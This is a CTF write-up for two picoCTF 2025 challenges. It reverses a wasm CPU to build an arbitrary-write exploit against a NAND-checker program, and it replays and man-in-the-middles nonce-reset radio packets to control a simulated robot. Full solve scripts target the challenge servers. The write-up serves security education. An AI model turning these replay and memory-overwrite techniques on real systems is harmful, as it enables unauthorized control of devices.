owned this note
owned this note
Published
Linked with GitHub
# picoCTF 2025 Writeups
## Pachinko Revisited
### writeup
We are given partial source for the remote server, with the source for the CPU missing. Instead we have a wasm binary that executes a single internal cycle of the processor via the exported `process` function.
Decompiling the wasm binary in ghidra and inspecting the `process` function shows a few thousand lines of bitwise xors. Given that the `synth_cpu` macro most likely synthesizes verilog output into some rust equivalent, we can assume that this giant block of xors is the compiled verilog code.
```py=
bVar17 = state[0x43]
state[0x48] = bVar17 ^ 0xff
bVar16 = state[0x46]
state[0x49] = bVar16 ^ 0xff
....
bVar22 = bVar16 & state[0x66] ^ 0xff
state[0x47c] = bVar22
bVar22 = bVar22 & bVar30
```
We can extract this code from ghidra into python since it is all bitwise operators and array indexing.
Looking at the server js, we can see a list of the port definitions for the processor:
```javascript=
return {
clock: getBitFromJson(json, "clock"),
addr: getBitsFromJson(json, "addr"),
inp_val: getBitsFromJson(json, "inp_val"),
out_val: getBitsFromJson(json, "out_val"),
reset: getBitFromJson(json, "reset"),
write_enable: getBitFromJson(json, "write_enable"),
halted: getBitFromJson(json, "halted"),
flag: getBitFromJson(json, "flag"),
};
```
We can infer from how the code is splitting the port bits and the size of the memory array that the width of `inp_val`, `out_val`, and `addr` are 16 bits. `clock`, `reset`, `write_enable`, `halted`, and `flag` are all single bit ports.
Since verilog requires input or output annotation on ports, you would expect that any input ports used in the CPU would be read from the state array, but never written to.
Checking this assumption yield 18 bits of state that are read but never written to:
```
00 state[0x13]
01 state[0x14]
02 state[0x15]
03 state[0x16]
04 state[0x17]
05 state[0x18]
06 state[0x19]
07 state[0x1a]
08 state[0x1b]
09 state[0x1c]
10 state[0x1d]
11 state[0x1e]
12 state[0x1f]
13 state[0x20]
14 state[0x21]
15 state[0x22]
16 state[0x44]
17 state[2]
```
16 consecutive bits and 2 standalone bits. This matches up with the expected input ports, `inp_val`, `clock`, and `reset`. The consecutive run of bits is likely to be `inp_val`, while the `clock` and `reset` are unknown.
Next we need to determine the offsets of the rest of the ports. Since memory is external the processor will need to fetch each instruction from memory on every cycle. We expect that the `addr` output port will increment by at least 2 on every cycle.
We can check this with a script to iterate over all sequences of 16 bits of the state array and look for changes that increment by 2. Here we can also check which offsets of `clock` and `reset` are correct. If we guess `clock` and `reset` wrong, we expect that an increment of 2 will not appear since the clock is not stepping. Checking the 2 possible combinations of `clock` and `reset` shows that the expected increment of 2 only appears with `clk` offset of `0x02` and `reset` offset of `0x44`. The increment also only appears in bits `0x12:0x03`, which is most likely the `addr` output port.
Currently known ports look like:
```
02 - => clk
03 - 12 => addr probably
13 - 22 => inp_val
23 - 32 => ??
33 - 42 => ??
43 - => ??
44 - => reset
45 - => ??
46 - => ??
```
This is just enough ports to start executing instructions, since we can respond to memory reads (but not memory writes yet). Taking a look at the 2 provided binaries (`nand_checker.bin` and `flag.bin`) we noticed that they both end in `0x000f`. This is most likely the `halt` instruction, and attempting to execute this instruction confirms this as executing this instruction halts the cpu.
From here we just need to figure out what the `out_val` offset is, so we execute the `nand_checker` binary and look at which port (`0x32:0x23` or `0x42:0x33`) outputs values that look like are being written to memory. Running `nand_checker` shows that `0x42:0x33` seems to increment by 4 every instruction, while `0x32:0x23` outputs constants that we know are written to memory. This tells us that `0x42:0x33` is probably the program counter since the instructions are probably 4 bytes wide and `0x32:0x23` is `out_val`.
From here since most of the port offsets have been reversed, we can figure out which offsets correspond to `write_enable` and `halt` by running instructions from `nand_checker` and inspecting the behavior of nearby offsets `43`, `45`, `46`, `47`, `48`. Observing the behavior of these bits shows that `46` is most likely `halt` and `45` is most likely `write_enable`.
Now that we have all the ports needed to properly run the cpu, we can start reversing the behavior of `nand_checker`. We know that the program is simulating the behavior of `nand` gates, and that certain inputs/outputs are placed at constant addresses in memory. Using this information and our local cpu implementation we start to slowly reverse the behavior of the instructions.
```x86asm
; nand_checker.bin
0x0000 load_imm r4, 0x3000
0x0004 load_imm r5, 0x1000
0x0008 load_imm r6, 0x2000
0x000c load_imm r0, 0x0
0x000e add r0, r4
0x0010 load_imm r2, 0x1000
0x0014 load r1, [r0]
0x0016 add_imm r0, 0x2
0x0018 jmp_if_0 r1, 0x22
0x001a r1 = (r1 < r2)
0x001c jmp_if_0 r1, 0x4c
0x001e load_imm r1, 0x0
0x0020 jmp_if_0 r1, 0x14
0x0022 load r0, [r4]
0x0024 add_imm r4, 0x2
0x0026 load r1, [r4]
0x0028 add_imm r4, 0x2
0x002a load r2, [r4]
0x002c add_imm r4, 0x2
0x002e jmp_if_0 r0, 0x4c
0x0030 jmp_if_0 r1, 0x4c
0x0032 jmp_if_0 r2, 0x4c
0x0034 shl r0, 1
0x0036 shl r1, 1
0x0038 shl r2, 1
0x003a add r0, r6
0x003c add r1, r6
0x003e add r2, r6
0x0040 load r0, [r0]
0x0042 load r1, [r1]
0x0044 nand r0, r1
0x0046 store [r2], r0
0x0048 load_imm r7, 0x0
0x004a jmp_if_0 r7, 0x22
0x004c load r0, [r5]
0x004e load_imm r1, 0xffff
0x0052 load_imm r2, 0x2
0x0054 load_imm r7, 0x0
0x0056 add r5, r2
0x0058 add r6, r2
0x005a load r3, [r5]
0x005c load r4, [r6]
0x005e r3 = (r7 < r3)
0x0060 r4 = (r7 < r4)
0x0062 add r3, r4
0x0064 jmp_if_0 r3, 0x6c
0x0066 r3 = (r3 < r2)
0x0068 jmp_if_0 r3, 0x6c
0x006a jmp_if_0 r7, 0x72
0x006c add r0, r1
0x006e jmp_if_0 r0, 0x7e
0x0070 jmp_if_0 r7, 0x56
0x0072 load_imm r0, 0x3333
0x0076 load_imm r5, 0x1000
0x007a store [r5], r0
0x007c halt
0x007e load_imm r0, 0x1337
0x0082 load_imm r5, 0x1000
0x0086 store [r5], r0
0x0088 halt
```
```x86asm
; flag.bin
0x0000 load_imm r0, 0x6f73
0x0004 load_imm r1, 0x6563
0x0008 load_imm r2, 0x2e69
0x000c load_imm r3, 0x6f00
0x0010 flag_magic
0x0012 halt
```
Now we can inspect the behavior of `nand_checker`. It reads the circuit node offsets at `0x3000` and validates that each number is less than `0x1000`. Then it performs the actual processing of the input nand circuit and finally checks the input state against the expected output state.
In order to get the flag, we need to load magic numbers into registers `r0` through `r3` and execute the `flag_magic` instruction. However the `nand_checker` program never executes the `flag_magic` instruction. Since the program instructions and input/output are all located in the same memory space, the intended solution likely involves overwriting `nand_checker` with a new program that will execute the instructions to set the flag bit.
We noticed that while the program validates that the circuit nodes are all less than `0x1000`, it multiplies them by 2 before using them to index the `inputs` array. This means we can modify the circuit nodes at `0x3000` while the program is processing them.
Writing `0xfff` to the output node of a nand gate, than inverting it to `0xf000` will generate an offset of `0xe000` when scaled by 2. `0xe000 + 0x2000 & 0xffff == 0x0000`, which lets us modify the instructions of `nand_checker`. From here we just need to patch the `nand r0, r1` instruction to `add r0, r1` which allows us to contruct a 2 byte arbitrary write primitive.
From here exploitation is simple. We overwrite the instructions after the nand processing loop with the instructions from `flag.bin`. Once the cpu halts the flag bit will be set and we get the second flag.
### scripts
#### solve script
```py=
import requests
IN1, IN2, IN3, IN4 = range(5, 9)
OUT1, OUT2, OUT3, OUT4 = range(1, 5)
def con(a: int, b: int, o: int):
return { "input1": a, "input2": b, "output": o }
def num(n: int, const: int, dest: int):
r = []
for b in f"{n:0b}"[1:]:
r.append(con(dest, dest, dest))
if b == "1":
r.append(con(0 + const, dest, dest))
return r
def write(base: int, addr: int, n: int):
total = base - 4 + addr.bit_length() + addr.bit_count() + n.bit_length() + n.bit_count()
total *= 3
const = total + 3
r = [
*num(addr, 0x800 + const, 0x800 + total + 2),
*num(n, 0x800 + const, 0x800 + const + 1),
con(0xff0, 0x800 + const + 1, 1),
con(1, 1, 1),
]
return r
A = 0
B = A + 6
TARGET = A + 10 * 3
circ= [
con(0xfff, 0xfff, 0xfff),
con(0xfff, 0xfff, 0xfff),
con(0x22, 0x101, 0x101),
con(0x800 + A + 0, 0x800 + A + 1, 0x800 + TARGET + 2),
con(0x800 + A + 2, 0x800 + A + 3, 0x800 + TARGET + 2),
con(0x800 + A + 4, 0x800 + A + 5, 0x800 + TARGET + 2),
con(0x800 + TARGET + 2, 0x800 + TARGET + 2, 0x800 + TARGET + 2),
con(0x800 + B + 0, 0x800 + B + 0, 0x800 + B + 0),
con(0x800 + TARGET + 2, 0x800 + B + 0, 0x800 + TARGET + 2),
con(0x800 + B + 1, 0x800 + B + 1, 0x800 + B + 2),
con(0x800 + B + 2, 0x800 + B + 2, 1),
]
circ.extend(write(len(circ), 0xf000 + 38, 0x0d))
circ.extend(write(len(circ), 0xf000 + 39, 0x6f73))
circ.extend(write(len(circ), 0xf000 + 40, 0x1d))
circ.extend(write(len(circ), 0xf000 + 41, 0x6563))
circ.extend(write(len(circ), 0xf000 + 42, 0x2d))
circ.extend(write(len(circ), 0xf000 + 43, 0x2e69))
circ.extend(write(len(circ), 0xf000 + 44, 0x3d))
circ.extend(write(len(circ), 0xf000 + 45, 0x6f00))
circ.extend(write(len(circ), 0xf000 + 46, 0x0e))
circ.extend(write(len(circ), 0xf000 + 47, 0x0f))
HOST = "http://activist-birds.picoctf.net:61075/"
res = requests.post(f"{HOST}/check", json={
"circuit": circ
})
print(res.status_code)
print(res.text)
print(res.json())
```
#### readonly/writeonly script
```py=
import re
prog = open("prog.txt").read()
lines = prog.strip().splitlines()
reads = []
writes = []
for line in lines:
d, s = line.strip().split(" = ")
reads.extend(re.findall(r"state\[.+?\]", s))
if d.startswith("state"):
writes.append(d)
writeonly = set()
for w in writes:
if w not in reads:
o = w.split("[")[1]
o = o.split("]")[0]
o = int(o, 0)
if o > 0x100:
continue
writeonly.add(w)
readonly = set()
for r in reads:
if f"{r} =" not in prog:
readonly.add(r)
print(f"READONLY")
for i, r in enumerate(sorted(readonly)):
print(f"{i+1:02} {r}")
print(f"WRITEONLY")
for i, r in enumerate(sorted(writeonly)):
print(f"{i+1:02} {r}")
```
#### analysis script
```py=
from cpu import *
import colorama
class Machine:
def __init__(self):
self.state = bytearray([0] * 100_000)
self.insns = None
self.inputs = None
self.outputs = None
self.circuit = None
self.iters = 0
@property
def v(self):
return BitView(self.state)
def reset(self):
run(self.state)
self.v[I_RST] = 1
run(self.state)
self.v[I_RST] = 0
run(self.state)
def save(self):
self.saved_state = bytearray(len(self.state))
self.saved_state[:] = self.state
self.saved_insns = copy.deepcopy(self.insns)
self.saved_inputs = copy.deepcopy(self.inputs)
self.saved_outputs = copy.deepcopy(self.outputs)
self.saved_iters = self.iters
self.saved_circuit = copy.deepcopy(self.circuit)
def restore(self):
self.state = self.saved_state
self.insns = self.saved_insns
self.inputs = self.saved_inputs
self.outputs = self.saved_outputs
self.iters = self.saved_iters
self.circuit = self.saved_circuit
def step(self, hijack: int = None, show = True):
self.iters += 1
self.v[I_CLK] ^= 1
run(self.state)
c = self.v[0x02] # clk
d = self.v[0x03:0x13] # addr
e = self.v[0x13:0x23] # inp val
f = self.v[0x23:0x33] # out val
g = self.v[0x33:0x43] # pc probably
h = self.v[0x43] # ??
i = self.v[0x44] # reset
j = self.v[0x45] # write enable
k = self.v[0x46] # halt
l = self.v[0x47] # flag maybe?
m = self.v[0x48]
n = self.v[0x49]
o = self.v[0x4a]
# if j == 1:
# if l == 1:
# print(c, f"{d:08x}", f"{e:08x}", f"{f:08x}", h, i, f"w={j}", f"h={k}", f"f={l}", m, n, o)
# break
if show:
print(c, f"{d:08x}", f"{e:08x}", f"{f:08x}", f"pc={g:04x}", h, i, f"w={j}", f"h={k}", f"f={l}", m, n, o)
addr = self.v[O_ADDR:O_ADDR+0x10]
# assert (addr & 1) == 0, f"{addr:04x}"
if self.v[I_CLK] == 0:
if self.v[O_WREN] == 1:
print(f"writing to {addr:04x}")
print([f"{hex(i)}" for i in self.circuit[TARGET-3:TARGET+3]])
if addr >= 0x3000:
self.circuit[(addr - 0x3000) >> 1] = self.v[O_DATA:O_DATA+0x10]
elif addr >= 0x2000:
self.inputs [(addr - 0x2000) >> 1] = self.v[O_DATA:O_DATA+0x10]
elif addr >= 0x1000:
self.outputs[(addr - 0x1000) >> 1] = self.v[O_DATA:O_DATA+0x10]
else:
self.insns [(addr - 0x0000) >> 1] = self.v[O_DATA:O_DATA+0x10]
# print(f"reading from {addr:04x}")
if addr < 0x1000:
# print(f"{addr = :#x}")
try:
self.v[I_DATA:I_DATA+0x10] = hijack or self.insns[addr >> 1]
except IndexError:
print(f"insn fetch error")
return False
elif addr >= 0x4000:
pass
# cases in descending order
elif addr >= 0x3000:
self.v[I_DATA:I_DATA+0x10] = self.circuit[(addr - 0x3000) >> 1]
elif addr >= 0x2000:
self.v[I_DATA:I_DATA+0x10] = self.inputs [(addr - 0x2000) >> 1]
elif addr >= 0x1000:
self.v[I_DATA:I_DATA+0x10] = self.outputs[(addr - 0x1000) >> 1]
return not self.v[O_HALT]
IN1, IN2, IN3, IN4 = range(5, 9)
OUT1, OUT2, OUT3, OUT4 = range(1, 5)
def con(a: int, b: int, o: int):
return { "input1": a, "input2": b, "output": o }
circ = [
con(IN1, IN1, OUT1),
con(IN2, IN2, OUT2),
con(IN3, IN3, OUT3),
con(IN4, IN4, OUT4),
]
def num(n: int, const: int, dest: int):
r = []
for b in f"{n:0b}"[1:]:
r.append(con(dest, dest, dest))
if b == "1":
r.append(con(0 + const, dest, dest))
return r
def write(base: int, addr: int, n: int):
total = base - 4 + addr.bit_length() + addr.bit_count() + n.bit_length() + n.bit_count()
total *= 3
const = total + 3
r = [
*num(addr, 0x800 + const, 0x800 + total + 2),
*num(n, 0x800 + const, 0x800 + const + 1),
con(0xff0, 0x800 + const + 1, 1),
con(1, 1, 1),
]
return r
# writes = [
# *num(0x0f)
# ]
A = 0
B = A + 6
TARGET = A + 10 * 3
circ= [
con(0xfff, 0xfff, 0xfff),
con(0xfff, 0xfff, 0xfff),
con(0x22, 0x101, 0x101),
con(0x800 + A + 0, 0x800 + A + 1, 0x800 + TARGET + 2),
con(0x800 + A + 2, 0x800 + A + 3, 0x800 + TARGET + 2),
con(0x800 + A + 4, 0x800 + A + 5, 0x800 + TARGET + 2),
con(0x800 + TARGET + 2, 0x800 + TARGET + 2, 0x800 + TARGET + 2),
con(0x800 + B + 0, 0x800 + B + 0, 0x800 + B + 0),
con(0x800 + TARGET + 2, 0x800 + B + 0, 0x800 + TARGET + 2),
con(0x800 + B + 1, 0x800 + B + 1, 0x800 + B + 2),
con(0x800 + B + 2, 0x800 + B + 2, 1),
]
circ.extend(write(len(circ), 0xf000 + 38, 0x0d))
circ.extend(write(len(circ), 0xf000 + 39, 0x6f73))
circ.extend(write(len(circ), 0xf000 + 40, 0x1d))
circ.extend(write(len(circ), 0xf000 + 41, 0x6563))
circ.extend(write(len(circ), 0xf000 + 42, 0x2d))
circ.extend(write(len(circ), 0xf000 + 43, 0x2e69))
circ.extend(write(len(circ), 0xf000 + 44, 0x3d))
circ.extend(write(len(circ), 0xf000 + 45, 0x6f00))
circ.extend(write(len(circ), 0xf000 + 46, 0x0e))
circ.extend(write(len(circ), 0xf000 + 47, 0x0f))
circuit: list[int] = []
for c in circ:
circuit.append(c["input1"])
circuit.append(c["input2"])
circuit.append(c["output"])
# circuit = [0xffff, 0xffff, 0xffff]
circuit.extend([0] * 0x2000)
# pc=001a insn=1712 r0=3002 r1=0001 r2=1000 r3=0000 r4=3000 r5=1000 r6=2000 r7=0000
# pc=0060 insn=4774 r0=0004 r1=ffff r2=0002 r3=0000 r4=0001 r5=1002 r6=2002 r7=0000
A = 0xffff
B = 0x0000
inputs = [0] * 5 + [0, 0, 0, 0] + [0] * 0x1000
outputs = [0x0004, 0, 0, 0, 0] + [0] * 0x1000
insns = open("programs/nand_checker.bin", "rb").read()
insns = [int.from_bytes(insns[i:i+2], "little") for i in range(0, len(insns), 2)]
insns += [0x0f] * 16
import copy
def create():
m = Machine()
m.insns = copy.copy(insns)
m.inputs = copy.copy(inputs)
m.outputs = copy.copy(outputs)
m.circuit = copy.copy(circuit)
return m
# m = create()
# while m.step(show=True):
# pass
# exit(1)
import pickle
regs = [f"r{i}" for i in range(8)]
sizes = {
0xd: 4,
0xc: 2,
0x8: 2,
0xb: 2,
0x4: 2,
0x7: 2,
0x1: 2,
0x6: 2,
0x9: 2,
0xf: 2,
}
try:
dump = pickle.load(open("dump.pk", "rb"))
except:
dump = {
0: {}
}
prev = {}
for reg in regs:
prev[reg] = 0
pc = max(dump.keys())
m = create()
show = False
for i in range(MAX):
dump[pc] = {}
# m.step()
# if m.v[O_HALT] == 1:
# break
while m.v[O_PC:O_PC+0x10] == pc or (m.v[O_PC:O_PC+0x10] != m.v[O_ADDR:O_ADDR+0x10]):
m.step(show=show)
if m.v[O_HALT] == 1:
print(m.iters)
print("done")
raise RuntimeError()
idx = pc >> 1
size = 0
size = sizes[insns[idx] & 0b1111]
new = m.v[O_PC:O_PC+0x10]
ib = m.insns[idx:idx+(size>>1)]
ib = " ".join(f"{n&0xff:02x}{n>>8:02x}" for n in ib)
# print(f"{new = :#x}")
# print("DUMPING")
for j in range(len(regs)):
m.save()
reg = regs[j]
if reg not in dump[pc]:
insn = 0b1011 | (j << 3) | (j << 8)
m.v[I_DATA:I_DATA+0x10] = insn
m.step(hijack=insn, show=False)
try:
m.step(hijack=insn, show=False)
except: pass
dump[pc][reg] = m.v[O_ADDR:O_ADDR+16]
m.restore()
pass
coloring = [reg not in prev or prev[reg] != dump[pc][reg] for reg in regs]
regdump = [f"{r}={dump[pc][r]:04x}" for r in regs]
regdump = [f"{colorama.Fore.LIGHTRED_EX}{r}{colorama.Fore.RESET}" if c else r for (c, r) in zip(coloring, regdump)]
regdump = " ".join(regdump)
print(f"{pc=:04x} insn={ib:<9} {regdump}")
# print("DONE")
prev = dump[pc]
pc = new
```
#### disassembler script
```py=
import io
import sys
def split_upper(upper: int):
return (upper & 0xf), (upper >> 4) & 0xf
class Diassem:
def __init__(self, bytes):
self.b = io.BytesIO(bytes)
def read_op_regs(self):
bt = self.b.read(2)
if len(bt) < 2: raise Exception("out of instructions")
op = bt[0] & 0xf
reg1 = (bt[0] >> 4) & 0xf
return op, reg1, bt[1]
def disassem(self):
out = []
try:
lut = [
self.read_0, # 0
self.read_1, # 1
self.read_stub, # 2
self.read_stub, # 3
self.read_4, # 4
self.read_stub, # 5
self.read_6, # 6
self.read_7, # 7
self.read_8, # 8
self.read_9, # 9
self.read_stub, # a
self.read_b, # b
self.read_c, # c
self.read_d, # d
self.read_e, # e
self.read_f, # f
]
while True:
op, reg1, upper = self.read_op_regs()
out.append(f"0x{(self.b.tell() - 2):04x}\t" + lut[op](op, reg1, upper))
except Exception as e:
print(e)
finally:
print("\n".join(out))
def read_stub(self, op, reg1, reg2):
return f"??? {op} r{reg1} {reg2}"
def read_0(self, op, reg1, upper):
return f"nop"
def read_1(self, op,reg1, upper):
# owen insisted
if reg1 == upper: return f"shl r{reg1}, 1"
return f"add r{reg1}, r{upper}"
def read_4(self, op, reg1, upper):
return f"add_imm r{reg1}, {hex(upper)}"
def read_6(self, op, reg1, upper):
return f"nand r{reg1}, r{upper}"
def read_7(self, op, reg1, upper):
reg2, reg3 = split_upper(upper)
return f"r{reg1} = (r{reg3} < r{reg2})"
def read_8(self, op, reg1, upper):
return f"load_imm r{reg1}, {hex(upper)}"
def read_9(self, op, reg1, reg2):
return f"store [r{reg1}], r{reg2}"
def read_b(self, op, reg1, reg2):
return f"load r{reg1}, [r{reg2}]"
def read_c(self, op, reg1, addr):
return f"jmp_if_0 r{reg1}, {hex(addr)}"
def read_d(self, op, reg1, reg2):
imm = int.from_bytes(self.b.read(2), "little")
return f"load_imm r{reg1}, {hex(imm)}"
def read_e(self, op, reg1, upper):
return "flag_magic"
def read_f(self, op, reg1, reg2):
return f"halt {'(strange)' if reg1 or reg1 else ''}"
file = open(sys.argv[1], "rb").read()
dis = Diassem(file)
dis.disassem()
```
## Ricochet
1. Notice that changing the address of the controller allows you to MITM the robot -> controller channel
2. Notice that the nonce resets, and that you can reuse the packets that were previously played to make the robot do things without the controller's consent.
3. Notice that sending back the secure_data_request packet to the robot allows the nonce to be incremented without doing anything (not included in the 20 move limit).
Using all this, we can painstakingly put together a hand made solve script to get the flag. It only works some of the time because of certain race conditions with changing the controller's address.
### solve script
```py=
from asyncio import wait_for
import requests
import time
import json
import copy
from pwn import log, sleep
"""
original RC addr is 16
new RC addr is 0
robot addr is 32
ack and request have empty bodies
"""
TYPE = "msg_type"
DST = "dst"
SRC = "src"
RC = 16
BOT = 32
ME = 1
MSG = "message"
ENC = "encrypted"
SERVER_URL = "http://activist-birds.picoctf.net:51576/"
y = input("reuse? ")
if y.lower() in ["y" or "yes"]:
ALL = json.load(open("radio_rx.json", "r"))
else:
req = requests.get(SERVER_URL + "/radio_rx")
print(f"{req.status_code = }")
ALL = json.loads(req.text)
with open("radio_rx.json", "w+") as fp:
json.dump(ALL, fp)
secure_data = {}
secure_data_response = {}
secure_data_ack = {}
secure_data_request = {}
controller_nonce = 0
robot_nonce = 0
for i in ALL:
if i['msg_type'] == 'secure_data':
i['dst'] = '0'
secure_data[robot_nonce] = i
robot_nonce += 1
if i['msg_type'] == 'secure_data_response':
secure_data_response[controller_nonce] = i
controller_nonce += 1
if i['msg_type'] == 'secure_data_ack':
secure_data_ack[controller_nonce] = i
controller_nonce += 1
if i['msg_type'] == 'secure_data_request':
i['dst'] = '0'
secure_data_request[robot_nonce] = i
robot_nonce += 1
# Returns a list of messages seen on the air since the last time this function
# was called
def receive_radio_messages():
messages = requests.get(SERVER_URL+"/radio_rx").json()
for msg in messages:
log.info(f"Received message: {msg}")
return messages
def wait_for_radio_message(type: str):
all = []
while True:
msgs = receive_radio_messages()
all.extend(msgs)
for msg in msgs:
if msg["msg_type"] == type:
log.info(f"FOUND MSG OF TYPE {type}")
return all
# [message] argument should be a Python dict object
def inject_radio_message(message, msg_type = None, dst = None, src = None, show = False):
message = copy.deepcopy(message)
if msg_type is not None:
message[TYPE] = msg_type
if dst is not None:
message[DST] = dst
if src is not None:
message[SRC] = src
if show:
log.info(f"injecting: {message}")
requests.post(SERVER_URL+"/radio_tx", json=message)
def start_robot():
requests.get(SERVER_URL+"/start")
def stop_robot():
requests.get(SERVER_URL+"/stop")
def get_board_state():
return requests.get(SERVER_URL+"/state").json()
start_robot()
wait_for_radio_message("debug")
inject_radio_message({"msg_type": "set_addr", "dst": 16, "src": 1, "new_addr": 0})
a = wait_for_radio_message("secure_data")[-1]
log.info(f"got a = {a.get(ENC)[:16]}")
inject_radio_message(secure_data_ack[2], dst=BOT)
bot_nonce = 3
rc_nonce = 2
wait_for_radio_message("secure_data_request")
for _ in range(10):
if bot_nonce % 2 == 1:
bot_msg = secure_data_request[bot_nonce]
else:
bot_msg = secure_data_ack[bot_nonce]
inject_radio_message(bot_msg, dst=BOT, msg_type="secure_data_response")
wait_for_radio_message("secure_data_request")
if rc_nonce % 2 == 1:
inject_radio_message(secure_data_request[rc_nonce], dst=0, src=1)
wait_for_radio_message("secure_data_response")
else:
inject_radio_message(secure_data[rc_nonce], dst=0, src=1)
wait_for_radio_message("secure_data_ack")
log.info("incremented BOT and RC")
bot_nonce += 1
rc_nonce += 1
log.info(f"BOT nonce is now {bot_nonce}")
log.info(f"RC nonce is not {rc_nonce}")
# BOT is still waiting for secure_data_response
# RC is idling
inject_radio_message(secure_data[rc_nonce], dst=0, src=1)
wait_for_radio_message("secure_data_ack")
rc_nonce += 1 # rc nonce is now 13
inject_radio_message({ TYPE: "set_addr", DST: 0, SRC: 1, "new_addr": 16 })
wait_for_radio_message("ack_set_addr")
inject_radio_message(secure_data_request[bot_nonce], dst=16, src=32)
rc_nonce += 1 # rc nonce is now 14
# high nonces should start at 14 now
high = []
for i in range(19):
print(i)
high.extend(wait_for_radio_message("secure_data_response"))
log.info(f"ignoring {high[0]}")
high = high[1:]
with open("high.json", "w+") as fp:
json.dump(high, fp)
# sleep(10)
# a = receive_radio_messages()[-1]
# sleep(.5)
log.info("should be done")
robot_nonce = 14
controller_nonce = 14
for i in high:
if i['msg_type'] == 'secure_data':
i['dst'] = '0'
secure_data[robot_nonce] = i
robot_nonce += 1
if i['msg_type'] == 'secure_data_response':
secure_data_response[controller_nonce] = i
controller_nonce += 1
if i['msg_type'] == 'secure_data_ack':
secure_data_ack[controller_nonce] = i
controller_nonce += 1
if i['msg_type'] == 'secure_data_request':
i['dst'] = '0'
secure_data_request[robot_nonce] = i
robot_nonce += 1
log.info(f"done assigning high nonces")
start_robot()
wait_for_radio_message("debug")
inject_radio_message({"msg_type": "set_addr", "dst": "16", "src":"1", "new_addr": "0"})
a = wait_for_radio_message("secure_data")[-1]
log.info(f"got a = {a.get(ENC)[:16]}")
inject_radio_message(secure_data_ack[2], dst=BOT)
"""
THING
"""
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[3], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 4
wait_for_radio_message("secure_data")
inject_radio_message(secure_data_ack[4], dst=BOT)
# now we're at nonce 5
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[5], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 6
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[6], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 7
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[7], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 8
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[8], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 9
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[9], dst=BOT)
# now we're at nonce 10
wait_for_radio_message("secure_data")
inject_radio_message(secure_data_ack[10], dst=BOT)
# now we're at nonce 11
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[11], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 12
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[12], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 13
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[13], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 14
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[14], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 15
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[15], dst=BOT)
# now we're at nonce 16
wait_for_radio_message("secure_data")
inject_radio_message(secure_data_ack[16], dst=BOT)
# now we're at nonce 17
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[17], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 18
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[18], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 19
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[19], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 20
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[20], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 21
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[21], dst=BOT)
# now we're at nonce 22
wait_for_radio_message("secure_data")
inject_radio_message(secure_data_ack[22], dst=BOT)
# now we're at nonce 23
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[23], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 24
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[24], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 25
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[25], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 26
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[26], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 27
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[27], dst=BOT)
# now we're at nonce 28
wait_for_radio_message("secure_data")
inject_radio_message(secure_data_ack[28], dst=BOT)
# now we're at nonce 29
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[29], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 30
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[30], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 31
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[31], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 32
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[32], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 33
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[33], dst=BOT)
# now we're at nonce 34
wait_for_radio_message("secure_data")
inject_radio_message(secure_data_ack[34], dst=BOT)
# now we're at nonce 35
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[35], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 36
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[36], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 37
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[37], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 38
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[38], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 39
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[39], dst=BOT)
# now we're at nonce 40
wait_for_radio_message("secure_data")
inject_radio_message(secure_data_ack[40], dst=BOT)
# now we're at nonce 41
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[41], dst=BOT)
# now we're at nonce 42
wait_for_radio_message("secure_data")
inject_radio_message(secure_data_ack[42], dst=BOT)
# now we're at nonce 43
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[43], dst=BOT)
quit("done")
```
